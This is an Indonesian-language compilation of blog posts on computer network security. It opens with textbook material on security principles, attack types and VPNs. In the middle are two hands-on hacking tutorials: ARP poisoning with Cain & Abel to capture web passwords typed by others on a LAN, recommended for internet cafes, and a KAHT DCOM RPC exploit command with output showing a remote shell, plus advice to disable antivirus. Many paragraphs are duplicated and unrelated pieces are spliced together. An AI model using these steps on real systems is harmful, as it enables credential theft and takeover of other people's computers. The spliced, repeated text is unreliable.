Pengertian Keamanan Komputer dan Konsep Keamanan Jaringan
Keamanan jaringan komputer sebagai bagian dari sebuah sistem informasi
adalah sangat penting untuk menjaga validitas dan integritas data serta
menjamin keterrsediaan layanan begi penggunanya. Sistem harus dilindungi
dari segala macam serangan dan usaha-usaha penyusupan atau pemindaian
oleh pihak yang tidak berhak.
Komputer yang terhubung ke jaringan mengalami ancaman keamanan yang
lebih besar daripada host yang tidak terhubung kemana-mana. Dengan
mengendalikan network security, resiko tersebut dapat dikurangi. Namun
network security biasanya bertentangan dengan network acces, karena bila
network acces semakin mudah, network security makin rawan. Bila network
security makin baik, network acces semakin tidak nyaman. Suatu jaringan
didesain sebagai komunikasi data highway dengan tujuan meningkatkan
akses ke sistem komputer, sementara keamanan didesain untuk mengontrol
akses. Penyediaan network security adalah sebagai aksi penyeimbang
antara open acces dengan security.
Prinsip Keamanan Jaringan
Prinsip keamanan jaringan dapat dibedakan menjadi tiga, yaitu :
a. Kerahasiaan
Kerahasiaan berhubungan dengan hak akses untuk membaca data atau
informasi dan suatu sistem computer. Dalam hal ini suatu sistem komputer
dapat dikatakan aman jika suatu data atau informasi hanya dapat dibaca
oleh pihak yang telah diberi hak atau wewenang secara legal.
b. Integritas (integrity)
Integrity berhubungan dengan hak akses untuk mengubah data atau
informasi dari suatu sistem computer. Dalam hal ini suatu sistem
komputer dapat dikatakan aman jika suatu data atau informasi hanya dapat
diubah oleh pihak yang telah diberi hak.
c. Ketersediaan (availability)
Availability berhubungan dengan ketersediaan data atau informasi pada
saat yang dibutuhkan. Dalam hal ini suatu sistem komputer dapat
dikatakan aman jika suatu data atau informasi yang terdapat pada sistem
komputer dapat diakses dan dimanfaatkan oleh pihak yang berhak.
d. Authentication
Aspek ini berhubungan dengan metoda untuk menyatakan bahwa informasi
betul-betul asli, orang yang mengakses atau memberikan informasi adalah
betul-betul orang yang dimaksud, atau server yang kita hubungi adalah
betul-betul server yang asli.
Untuk membuktikan keaslian dokumen dapat dilakukan dengan teknologi
watermarking dan digital signature. Sedangkan untuk menguji keaslian
orang atau server yang dimaksud bisa dilakukan dengan menggunakan
password, biometric (ciri-ciri khas orang), dan sejenisnya.
e. Akses Kontrol
Aspek kontrol merupakan fitur-fitur keamanan yang mengontrol bagaimana
user dan sistem berkomunikasi dan berinteraksi dengan system dan
sumberdaya yang lainnya. Akses kontrol melindungi sistem dan sumberdaya
dari akses yang tidak berhak dan umumnya menentukan tingkat otorisasi
setelah prosedur otentikasi berhasil dilengkapi.
Kontrol akses adalah sebuah term luas yang mencakup beberapa tipe
mekanisme berbeda yang menjalankan fitur kontrol akses pada sistem
komputer, jaringan, dan informasi. Kontrol akses sangatlah penting
karena menjadi satu dari garis pertahanan pertama yang digunakan untuk
menghadang akses yang tidak berhak ke dalam sistem dan sumberdaya
jaringan.
f. Non-Repudiation
Aspek ini menjaga agar seseorang tidak dapat menyangkal telah melakukan
sebuah transaksi. Penggunaan digital signature, certificates, dan
teknologi kriptografi secara umum dapat menjaga aspek ini. Akan tetapi
hal ini masih harus didukung oleh hukum sehingga status dari digital
signature itu jelas legal.
Jenis Serangan Terhadap Keamanan Jaringan
Pada dasarnya, menurut jenisnya, serangan terhadap suatu data dalam suatu jaringan dapat dikategorikan menjadi 2, yaitu:
1. Serangan Pasif
Merupakan serangan pada sistem autentikasi yang tidak menyisipkan data
pada aliran data, tetapi hanya mengamati atau memonitor pengiriman
informasi ke tujuan. Informasi ini dapat digunakan di lain waktu oleh
pihak yang tidak bertanggung jawab. Serangan pasif yang mengambil suatu
unit data kemudian menggunakannya untuk memasuki sesi autentikassi
dengan berpura-pura menjadi user yangg autentik / asli disebut dengan
replay attack. Beberapa informasi autentikasi seperti password atau data
biometric yang dikirim melalui transmisi elektronik dapat direkam dan
kemudian digunakan untuk memalsukann data yang sebenarnya. Serangan
pasif inni sulit dideteksi kareena penyerang tidak melakukan perubahan
data. Oleh sebab itu untuk mengatasi serangan pasif ini lebih ditekankan
pada pencegahan daripada pendeteksiannya.
2. Serangan Aktif
Merupakan serangan yang mencoba memodifikasi data, mencoba mendapatkan
autentikasi, atau mendapatkan autentikasi dengan mengirimkan paket-paket
data yang salah ke dalam data stream atau dengan memodifikassi
paket-paket yang melewati data stream. Kebalikan dari serangan pasif,
serangan aktif sulit untuk dicegah karena untuk melakukannya dibutuhkan
perlindungan fisik untuk semua fasilitass komunikassi dan jalur-jalurnya
setiap saat. Yang dapat dilakukan adalah mendeteksi dan memulihkan
keadaan yang disebabkan oleh serangan ini.
Bentuk-bentuk Ancaman
1. Memaksa masuk dan kamus password
Jenis ancaman keamanan jaringan ini lebih umum disebut sebagai Brute
Force and Dictionary, serangan ini adalah upaya masuk ke dalam jaringan
dengan menyerang database password atau menyerang login prompt yang
sedang active. Serangan masuk paksa ini adalah suatu upaya untuk
menemukan password dari account user dengan cara yang sistematis mencoba
berbagai kombinasi angka, huruf, atau symbol. Sementara serangan dengan
menggunakan metoda kamus password adalah upaya menemukan password
dengan mencoba berbagai kemungkinan password yang biasa dipakai user
secara umum dengan menggunakan daftar atau kamus password yang sudah
di-definisikan sebelumnya.
Untuk mengatasi serangan keamanan jaringan dari jenis ini anda
seharusnya mempunyai suatu policy tentang pemakaian password yang kuat
diantaranya untuk tidak memakai password yang dekat dengan kita missal
nama, nama anak, tanggal lahir dan sebagainya. Semakin panjang suatu
password dan kombinasinya semakin sulit untuk diketemukan. Akan tetapi
dengan waktu yang cukup, semua password dapat diketemukan dengan metoda
brute force ini.
2. Denial of Services (DoS)
Deniel of Services (DoS) ini adalah salah satu ancaman keamanan jaringan
yang membuat suatu layanan jaringan jadi mampet, serangan yang membuat
jaringan anda tidak bisa diakses atau serangan yang membuat system anda
tidak bisa memproses atau merespon terhadap traffic yang legitimasi atau
permintaan layanan terhadap object dan resource jaringan. Bentuk umum
dari serangan Denial of Services ini adalah dengan cara mengirim paket
data dalam jumlah yang sangat bersar terhadap suatu server dimana server
tersebut tidak bisa memproses semuanya. Bentuk lain dari serangan
keamanan jaringan Denial of Services ini adalah memanfaatkan telah
diketahuinya celah yang rentan dari suatu operating system, layanan-2,
atau applikasi-2. Exploitasi terhadap celah atau titik lemah system ini
bisa sering menyebabkan system crash atau pemakaian 100% CPU.
Tidak semua Denial of Services ini adalah merupakan akibat dari serangan
keamanan jaringan. Error dalam coding suatu program bisa saja
mengakibatkan kondisi yang disebut DoS ini. Disamping itu ada beberapa
jenis DoS seperti:
Distributed Denial of Services (DDoS), terjadi saat penyerang berhasil
meng-kompromi beberapa layanan system dan menggunakannya atau
memanfaatkannya sebagai pusat untuk menyebarkan serangan terhadap korban
lain.
Ancaman keamanan jaringan Distributed refelective deniel of service
(DRDoS) memanfaatkan operasi normal dari layanan Internet, seperti
protocol-2 update DNS dan router. DRDoS ini menyerang fungsi dengan
mengirim update, sesi, dalam jumlah yang sangat besar kepada berbagai
macam layanan server atau router dengan menggunakan address spoofing
kepada target korban.
Serangan keamanan jaringan dengan membanjiri sinyal SYN kepada system
yang menggunakan protocol TCP/IP dengan melakukan inisiasi sesi
komunikasi. Seperti kita ketahui, sebuah client mengirim paket SYN
kepada server, server akan merespon dengan paket SYN/ACK kepada client
tadi, kemudian client tadi merespon balik juga dengan paket ACK kepada
server. Ini proses terbentuknya sesi komunikasi yang disebut Three-Way
handshake yang dipakai untuk transfer data sampai sesi tersebut
berakhir. Kebanjiran SYN terjadi ketika melimpahnya paket SYN dikirim ke
server, tetapi si pengirim tidak pernah membalas dengan paket akhir
ACK.
Serangan keamanan jaringan dalam bentuk Smurf Attack terjadi ketika
sebuah server digunakan untuk membanjiri korban dengan data sampah yang
tidak berguna. Server atau jaringan yang dipakai menghasilkan response
paket yang banyak seperti ICMP ECHO paket atau UDP paket dari satu paket
yang dikirim. Serangan yang umum adalah dengan jalan mengirimkan
broadcast kepada segmen jaringan sehingga semua node dalam jaringan akan
menerima paket broadcast ini, sehingga setiap node akan merespon balik
dengan satu atau lebih paket respon.
Serangan keamanan jaringan Ping of Death, adalah serangan ping yang
oversize. Dengan menggunakan tool khusus, si penyerang dapat mengirimkan
paket ping oversized yang banyak sekali kepada korbannya. Dalam banyak
kasus system yang diserang mencoba memproses data tersebut, error
terjadi yang menyebabkan system crash, freeze atau reboot. Ping of Death
ini tak lebih dari semacam serangan Buffer overflow akan tetapi karena
system yang diserang sering jadi down, maka disebut DoS attack.
Stream Attack terjadi saat banyak jumlah paket yang besar dikirim menuju
ke port pada system korban menggunakan sumber nomor yang random.
3. Spoofing
Spoofing adalah seni untuk menjelma menjadi sesuatu yang lain. Spoofing
attack terdiri dari IP address dan node source atau tujuan yang asli
atau yang valid diganti dengan IP address atau node source atau tujuan
yang lain.
4. Serangan Man-in-the-middle
Serangan keamanan jaringan Man-in-the-middle (serangan pembajakan)
terjadi saat user perusak dapat memposisikan diantara dua titik link
komunikasi.
* Dengan jalan mengkopy atau menyusup traffic antara dua party, hal ini pada dasarnya merupakan serangan penyusup.
* Para penyerang memposisikan dirinya dalam garis komunikasi dimana dia
bertindak sebagai proxy atau mekanisme store-and-forwad (simpan dan
lepaskan).
Para penyerang ini tidak tampak pada kedua sisi link komunikasi ini dan
bisa mengubah isi dan arah traffic. Dengan cara ini para penyerang bisa
menangkap logon credensial atau data sensitive ataupun mampu mengubah
isi pesan dari kedua titik komunikasi ini.
5. Spamming
Spam yang umum dijabarkan sebagai email yang tak diundang ini,
newsgroup, atau pesan diskusi forum. Spam bisa merupakan iklan dari
vendor atau bisa berisi kuda Trojan. Spam pada umumnya bukan merupakan
serangan keamanan jaringan akan tetapi hampir mirip DoS.
6. Sniffer
Suatu serangan keamanan jaringan dalam bentuk Sniffer (atau dikenal
sebagai snooping attack) merupakan kegiatan user perusak yang ingin
mendapatkan informasi tentang jaringan atau traffic lewat jaringan
tersebut. suatu Sniffer sering merupakan program penangkap paket yang
bisa menduplikasikan isi paket yang lewat media jaringan kedalam file.
Serangan Sniffer sering difokuskan pada koneksi awal antara client dan
server untuk mendapatkan logon credensial, kunci rahasia, password dan
lainnya.
7. Crackers
Ancaman keamanan jaringan Crackers adalah user perusak yang bermaksud
menyerang suatu system atau seseorang. Cracker bisasanya termotivasi
oleh ego, power, atau ingin mendapatkan pengakuan. Akibat dari kegiatan
hacker bisa berupa pencurian (data, ide, dll), disable system, kompromi
keamanan, opini negative public, kehilangan pasar saham, mengurangi
keuntungan, dan kehilangan produktifitas.
Virtual Private Network(VPN) adalah solusi koneksi private melalui jaringan publik. Dengan VPN maka kita dapat membuat jaringan di dalam jaringan atau biasa disebut tunnel.
Solusi VPN :
IPSEC, solusi VPN via IP Secure Protocol. Solusi yang sudah
distandarisasi tapi paling susah dikonfigurasi. Tingkat keamanan yang
cukup baik namun dalam implementasinya cukup rumit. Aplikasi yang
digunakan yang berbasis open source yaitu Open/Free Swan.
PPPT, solusi VPN versi awal. Merupakan solusi VPN dengan feature standar
dimana jaringan dibangun dengan point to point seperti halnya anda
melakukan dial up pada internet dirumah. Pada saat dial up ke provider
internet ada maka akan dibangun point to point tunnel melalui jaringan
telepon. Aplikasi OpenSource yang menggunakan PPPT adalah PopTop.
VPN with SSL, merupakan solusi VPN dengan menerapkan protocol Secure
Socket Layer(SSL) pada enkripsi jaringan tunnel yang dibuat. Solusi ini
diawali dengan aplikasi OpenVPN.
Fungsi VPN :
Menghubungkan kantor-kantor cabang melalui jaringan public. Dengan VPN
maka perusahaan tidak perlu membangun jaringan sendiri. Cukup terhubung
dengan jaringan public contohnya internet. Saat ini hampir semua kantor
perusahaan pasti memiliki akses internet. Dengan demikin bisa dihemat
anggaran koneksi untuk ke cabang-cabang.
Mobile working, dengan VPN maka karyawan dapat terhubung langsung dengan
jaringan kantor secara private. Maka karyawan dapat melakukan pekerjaan
yang bisa dilakukan dari depan komputer tanpa harus berada di kantor.
Hal ini menjadi solusi virtual office di jaman mobilitas tinggi seperti
sekarang ini.
Securing your network. Saat ini beberapa vendor seperti telkom
memberikan solusi VPN juga untuk perusahaan-perusahaan. Namun solusi ini
masih kurang aman. Karena untuk terhubung tidak memerlukan
authentikasi. Sehingga bila ada pengguna mengetahui settingan VPN
perusahaan tersebut maka dia dapat terhubung ke jaringan perusahaan tapi
harus login. Contohnya pada telkomsel VPN hanya dengan mengganti nama
APN pada settingan network maka dia dapat langsung terhubung dengan
jaringan dengan nama APN tersebut. Dengan memasang VPN lagi di jaringan
VPN semi publik tersebut maka jaringan akan lebih aman karena sebelum
masuk ke jaringan kantor maka user harus membuat tunnel dulu dan login
ke VPN server baru bisa terhubung dengan jaringan kantor.
Mengamankan jaringan wireless. Jaringan wireless merupakan jaringan
publik yang bisa diakses oleh siapa saja yang berada dijangkauan
wireless tersebut. Walaupun wireless juga memiliki pengaman seperti WEP,
WPA, WPA2 namun jaringan wireless masih saja bisa ditembus. Dengan
menggunakan VPN maka user yang terhubung ke wireless harus membuat
tunnel dulu dengan login ke VPN server baru bisa menggunakan resource
jaringan seperti akses internet dan sebagainya.
Dari beberapa solusi yang ada saat ini yang paling banyak digunakan
adalah solusi VPN dengan SSL yaitu dengan OpenVPN sebagai aplikasinya.
Selain gratis karena open source juga memiliki kemudahan implementasi.
Saya lebih memilih menggunakan OpenVPN karena kemudahan implementasinya
serta bersifat multiplatform dapat dijalankan pada Linux ataupun
Windows.
- Biaya lebih murah
Pembangunan jaringan leased line khusus atau pribadi memerlukan biaya
yang sangat mahal. VPN dapat menjadi alternatif yang dapat digunakan
untuk dapat mengatasi permasalahan diatas. VPN dibangun dengan
menggunakan jaringan internet milik publik tanpa perlu membangun
jaringan pribadi. Dengan demikian bila ingin menggunakan VPN hanya
diperlukan koneksi internet.
- Fleksibilitas
Semakin berkembangnya internet, dan makin banyaknya user yang
menggunakannya membuat VPN juga ikut berkembang. Setiap user dapat
tergabung dalam VPN yang telah dibangun tanpa terbatas jarak dan waktu.
Fleksibilitas dapat dicapai apabila user tersebut terkoneksi dengan
internet dan mendapat ijin menggunakan VPN.
- Kemudahan pengaturan dan administrasi
Keseluruhan VPN dapat diatur dalam server VPN sendiri, dan untuk dapat
digunakan oleh klien, maka perlu diinstal aplikasi VPN pada klien. Hal
ini tentu lebih mudah apabila dibandingkan dengan menggunakan leased
line yang masih perlu memonitor modem.
- Mengurangi kerumitan pengaturan dengan teknologi tunneling
Implementasi VPN :
1. Intranet VPN
Intranet merupakan koneksi VPN yang membuka jalur komunikasi pribadi
menuju ke jarinan lokal yang bersifat pribadi melalui jaringan publik
seperti internet. Dengan melalui VPN jenis ini, user dapat langsung
mengakses file-file kerja dengan leluasa tanpa terikat tempat dan waktu.
Apabila dianalogikan pada sebuah perusahaan, koneksi ke kantor pusat
dapat dilakukan dari mana saja, dari kantor pusat menuju ke kantor
cabang dapat pula dibuat koneksi pribadi, dan juga dari kantor juga
memungkinkan untuk dibuat jalur komunikasi pribadi yang ekonomis.
Ekstranet VPN merupakan fasilitas VPN yang diperuntukkan bagi
pihak-pihak dari luar anggota organisasi atau perusahaan, tetapi masih
memiliki hak dan kepentingan untuk dapat mengakses data dalam kantor.
Pada umumnya user dari VPN dari jenis ini merupakan customer, vendor,
partnet dan supplier dari suatu perusahaan.
3. Model Remote Access VPN
VPN merupakan sebuah proses remote access yang bertujuan mendapatkan
koneksi ke jaringan private tujuannya. Proses remote accsess VPN
tersebut dibedakan menjadi dua jenis berdasarkan oleh siapa proses
remote access VPN tersebut dilakukan. Kedua jenis tersebut antara lain
sebagai berikut.
4. Client-initiated
Secara harfiah, client-initiated merupakan pihak klien yang berinisiatif
untuk melakukan sesuatu. Pada VPN jenis ini, ketika sebuah komputer
ingin membangun koneksi VPN maka PC tersebutlah yang berusaha membangun
tunnel dan melakukan proses enkripsi hingga mencapai tujuannya dengan
aman. Namun, proses ini tetap mengandalkan jasa dari jaringan Internet
Service Provider (ISP) yang dapat digunakan untuk umum. Clien-initiated
digunakan oleh komputer-komputer umum dengan mengandalkan VPN server
atau VPN concentrator pada jaringan tujuannya.
5. Network Access Server-initiated
Berbeda dengan clien-initiated, VPN jenis network access
server-initiated ini tidak mengharuskan clien untuk membuat tunnel dan
melakukan enkrpsi dan dekripsi sendiri. VPN jenis ini hanya mengharuskan
user melakukan dial-in ke network access server (NAS) dari ISP.
Kemudian, NAS tersebut yang membangun tunnel menuju ke jaringan private
yang dituju oleh klien tersebut. Dengan demikian, koneksi VPN dapat
dibangun dan dipergunakan oleh banyak klien dari manapun, karena pada
umumnya NAS milik ISP tersebut memang dibuka untuk umum.
Keamanan Jaringan Komputer
Dua minggu terakhir
antara April dan Mei 2004, komunitas TI Indonesia diguncang berita
tertangkapnya pembobol situs KPU oleh pihak kepolisian yang dimotori
oleh tim ahli Teknologi Informasi KPU. Berita ini sebetulnya
tidakterlalu hebat jika tidak bernuansa politis, karena pembobolan situs
memang sudah dilakukan berkali-kali oleh anak-anak muda genius yang
dengan bangganya dapat menayangkan inspirasi mereka untuk diketahui
semua orang.
Pembobolan situs atau
web server sebetulnya tergolong teknik tradisional, karena belakangan
ini muncul teknik-teknik yang mampu mengobrak-abrik jaringan komputer
atau Internetdengan cara yang lebih canggih dan tidak terpikirkan
sebelumnya. Terjadinya pembobolan situs atau perusakan sistem memang
akan terus terjadi, karena seperti halnya kehidupan di dunia ini, selalu
berlomba antara polisi dan pencuri.
Kalau kita lihat ke
proses pembobolan situs KPU, yang salah adalah tim ahli TI KPU yang
tidak sigap menutup semua lubang yang memungkinkan masuknya pembobol,
karena pada kenyataannya keamanan suatu sistem itu tergantung pada
manusia yang menjaga dan mengoperasikan sistem tersebut, bukan melulu
kesalahan di perangkat atau si pembobolnya. Dari data Computer Security
Institute yaitu lembaga binaan FBI di Amerika, 71% serangan ke dalam
sistem jaringan komputer terjadi dari dalam. Artinya, yang menyebabkan
orang luar dapat masuk ke sistem adalah kelalaian dari dalam sendiri,
baik karena tidak melakukan pembaharuan sistem (patching) atau mengganti
password secara berkala.
sumber: http://www.ilmukomputer.com
Membobol Password Situs Web
Contoh kali ini
mengenai bagaimana membobol password seseorang jika seseorang itu
menuliskan password yang mana komputer yang dia pakai masih dalam satu
LAN yang sama dengan sang penyerang.
Sebelumnya, Saya akan
menjelaskan terlebih dahulu bahwa dalam contoh kasus kali ini Saya
menggunakkan konfigurasi jaringan seperti ini:
Pada contoh kasus
kali ini kita akan memanfaatkan kelemahan dari sistem jaringan yang
disebut ARP Spoofing. Singkatnya, peracunan ARP ini akan membuat data
mengalihkan data kiriman ke komputer penyerang. Misalnya, pada ilustrasi
di atas terlihat jaringan LAN yang terdiri dari 2 komputer. Harusnya,
jika data mau dikirimkan ke internet, maka data itu ya langsung
dikirimkan ke internet tanpa embel-embel apa pun (kecuali switch).
Namun, jika komputer penyerang mengirimkan racun ARP ke korban, maka
korban akan dibegoin. Setiap data yang dikirimkan dari korban, maka akan
mampir dulu di komputer penyerang.
Untuk mengirimkan
racun-racun ini, kita bisa menggunakan perangkat lunak bernama Cain ‘n
Abel. Untuk mengunduhnya, Anda dapat langsung mengunjungi situsnya.
Setelah diunduh Anda dapat langsung memasangnya seperti halnya memasang
perangkat lunak lainnya.
Setelah selesai
dipasang (diinstall), mulailah melakukan hacking. Sekarang buka program
Cain tersebut dan melakukan langkah-langkah berikut ini.
1. Aktifkan Sniffing
(pengintipan data) dan ARP Poisinoing. Caranya dapat Anda lihat pada
screenshot di bawah. Jika diminta memilih kartu jaringan, maka pilihlah
adapter jaringan yang Anda pakai. Terkadang akan terdeteksi 2 adapter
jaringan atau bahkan lebih. Untuk memilih yang mana yang benar, Anda
bisa coba-coba memilih salah satu di antaranya dan langsung ke langkah
selanjutnya. Jika langkah berikutnya tidak bekerja, cukup ganti lewat
menu Configure. Sebagai informasi, adapter YANG PASTI SALAH jika ada
kata DIALUP (karena ini modem dan bukan kartu jaringan).
Mengaktifkan Sniffing dan ARP.
2. Buka tabulasi sniffer, klik pada kotak kosong, klik tambah, lalu klik OK. Biarkan dia loading dan Anda akan melihat daftar komputer yang ada pada subnet yang sama. Anda tak perlu mengerti subnet itu apa, cukup ke langkah selanjutnya.
Menampilkan daftar komputer.
Mengaktifkan Sniffing dan ARP.
2. Buka tabulasi sniffer, klik pada kotak kosong, klik tambah, lalu klik OK. Biarkan dia loading dan Anda akan melihat daftar komputer yang ada pada subnet yang sama. Anda tak perlu mengerti subnet itu apa, cukup ke langkah selanjutnya.
Menampilkan daftar komputer.
Mengaktifkan Sniffing dan ARP.
3. Klik pada tabulasi Sniffer, lalu ke APR, lalu klik kotak kosong bagian atas, lalu klik tombol tambah.
Memulai meracuni dengan ARP
4. Kemudian akan muncul kotak dialog pemilihan “pembodohan rute data”. Di sini Anda harus memilih antara alamat IP komputer korban dan alamat IP node pusat. Untuk mengetahui alamat IP komputer korban, Anda harus nebak atau langsung ngecek di komputer korbannya. Untuk mengetahui alamat IP, pergi ke Start > Run > cmd > ENTER > ipconfig /all > ENTER. Setelah itu Anda akan melihat tampilan kira-kira seperti ini:
3. Klik pada tabulasi Sniffer, lalu ke APR, lalu klik kotak kosong bagian atas, lalu klik tombol tambah.
Memulai meracuni dengan ARP
4. Kemudian akan muncul kotak dialog pemilihan “pembodohan rute data”. Di sini Anda harus memilih antara alamat IP komputer korban dan alamat IP node pusat. Untuk mengetahui alamat IP komputer korban, Anda harus nebak atau langsung ngecek di komputer korbannya. Untuk mengetahui alamat IP, pergi ke Start > Run > cmd > ENTER > ipconfig /all > ENTER. Setelah itu Anda akan melihat tampilan kira-kira seperti ini:
C:\Users\Mufid>ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : fidz-vista
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : SiS 900-Based PCI Fast Ethernet Adapter
Physical Address. . . . . . . . . : 00-E0-18-AC-C4-8B
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : 00-E0-18-AC-C4-8B
IP Address. . . . . . . . . . . . : 192.168.1.6 (INI ALAMAT KORBAN)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1 (INI NODE PUSATNYA)
DHCP Server . . . . . . . . . . . : 192.168.1.1
Description . . . . . . . . . . . : SiS 900-Based PCI Fast Ethernet Adapter
Physical Address. . . . . . . . . : 00-E0-18-AC-C4-8B
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : 00-E0-18-AC-C4-8B
IP Address. . . . . . . . . . . . : 192.168.1.6 (INI ALAMAT KORBAN)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.1 (INI NODE PUSATNYA)
DHCP Server . . . . . . . . . . . : 192.168.1.1
Karena itu, langsung
saja lakukan penyadapan data antara alamat IP komputer korban dan alamat
IP node pusat. Sebagai tambahan, node pusat komputer korban dan
komputer penyerang adalah sama. Setelah selesai Anda dapat lihat
penyadapan telah dimulai!
5. Sekarang semua password yang diketikan di halaman web manapun di komputer korban akan terbaca di komputer penyerang!
6. Mari kita tes. Saya buka situs web Friendster di komputer korban.
Membuka situs web Friendster untuk menguji keampuhan racun-racun ini!
7. Lalu kembali ke komputer penyerang. Pergi ke tabulasi Passwords, lalu pilih HTTP dan geser daftar ke bawah. Wuuhuu Anda melihat passwordnya sekarang! Perlu diketahui, daftar ini diupdate secara real-time. Jadi setiap password yang dikirimkan lewat halaman web, akan muncul di komputer penyerang tanpa harus mengklik tombol REFRESH (karena memang tidak ada :p)
Lihatlah password-password itu terbongkar!
5. Sekarang semua password yang diketikan di halaman web manapun di komputer korban akan terbaca di komputer penyerang!
6. Mari kita tes. Saya buka situs web Friendster di komputer korban.
Membuka situs web Friendster untuk menguji keampuhan racun-racun ini!
7. Lalu kembali ke komputer penyerang. Pergi ke tabulasi Passwords, lalu pilih HTTP dan geser daftar ke bawah. Wuuhuu Anda melihat passwordnya sekarang! Perlu diketahui, daftar ini diupdate secara real-time. Jadi setiap password yang dikirimkan lewat halaman web, akan muncul di komputer penyerang tanpa harus mengklik tombol REFRESH (karena memang tidak ada :p)
Lihatlah password-password itu terbongkar!
Dan itulah bagaimana
cara melakukan hackingnya. Trik ini sangat efektif jika dilakukan di
warnet, karena di situ banyak password berterbaran.
Apakah ada cara
perlindungannya? Tentu saja ada. Tapi caranya cenderung agak ribet dan
gak’ simpel. Saran Saya, lebih baik Anda menggunakan komputer yang
terjamin keamanannya. Di rumah, misalnya. Meski begitu, sudah ada
beberapa situs web yang mengenkripsi password sebelum dikirim. Sehingga,
walau password dapat disadap, password itu tidak berarti apa-apa.
Membobol Password Jaringan
Artikel ini bukan
bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara
membobol password komputer orang lain, tapi hanya sekedar mengingatkan
kepada anda terutama bagi administrator jaringan atau pengguna komputer
yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa
password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.
Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools KahT.
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking missal
IP : 192.168.30.3
Kaht 192.168.30.1 192.168.30.3
Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking missal
IP : 192.168.30.3
Kaht 192.168.30.1 192.168.30.3
Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:
KAHT II – MASSIVE RPC EXPLOIT dst
[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+] Attacking Port:135. Remote Shell at port:36388
[+] Scan In Progress……
- Connecting to 192.168.30.3
Sending Exploit to a [Win2k] Server
- Connectando con la Shell Remote
dst……..
C:WINNTsystem32>
[+] Attacking Port:135. Remote Shell at port:36388
[+] Scan In Progress……
- Connecting to 192.168.30.3
Sending Exploit to a [Win2k] Server
- Connectando con la Shell Remote
dst……..
C:WINNTsystem32>
Berarti anda sudah
masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda
kuasai. anda bisa membuat user admin membuat sharing dll
Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.
Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.
Pengenalan Keamanan Jaringan Komputer
Artikel Keamanan Jaringan ini didedikasikan untuk memenuhi tugas mata kuliah Keamanan Jaringan Komputer.
Di dalam posting tentang pengenalan keamanan jaringan ini terbagi menjadi 3 bagian, yaitu : Keamanan dan Manajemen Perusahaan, Klasifikasi Kejahatan Komputer, dan Aspek dari Kemanan Jaringan. dan kita akan membahas semuanya satu persatu..
Di dalam posting tentang pengenalan keamanan jaringan ini terbagi menjadi 3 bagian, yaitu : Keamanan dan Manajemen Perusahaan, Klasifikasi Kejahatan Komputer, dan Aspek dari Kemanan Jaringan. dan kita akan membahas semuanya satu persatu..
Keamanan Dan Manajemen Perusahaan
Seringkali sulit untuk membujuk manajemen perusahaan atau pemilik sistem informasi untuk melakukan investasi di bidang keamanan. Di tahun 1997 majalah Information Week melakukan survey terhadap 1271 system atau network manager di Amerika Serikat. Hanya 22% yang menganggap keamanan sistem informasi sebagai komponen sangat penting(“extremely important”). Mereka lebih mementingkan “reducing cost” dan “improving competitiveness” meskipun perbaikan sistem informasi setelah dirusak justru dapat menelan biaya yang lebih banyak.
Seringkali sulit untuk membujuk manajemen perusahaan atau pemilik sistem informasi untuk melakukan investasi di bidang keamanan. Di tahun 1997 majalah Information Week melakukan survey terhadap 1271 system atau network manager di Amerika Serikat. Hanya 22% yang menganggap keamanan sistem informasi sebagai komponen sangat penting(“extremely important”). Mereka lebih mementingkan “reducing cost” dan “improving competitiveness” meskipun perbaikan sistem informasi setelah dirusak justru dapat menelan biaya yang lebih banyak.
Keamanan itu tidak
dapat muncul demikian saja. Dia harus direncanakan. Ambil contoh
berikut. Jika kita membangun sebuah rumah, maka pintu rumah kita harus
dilengkapi dengan kunci pintu. Jika kita terlupa memasukkan kunci pintu
pada budget perencanaan rumah, maka kita akan dikagetkan bahwa ternyata
harus keluar dana untuk menjaga keamanan.
Pengelolaan terhadap
keamanan dapat dilihat dari sisi pengelolaan resiko (riskmanagement).
Lawrie Brown dalam menyarankan menggunakan “Risk Management Model” untuk
menghadapi ancaman (managing threats). Ada tiga komponen yang
memberikan kontribusi kepada Risk, yaitu :
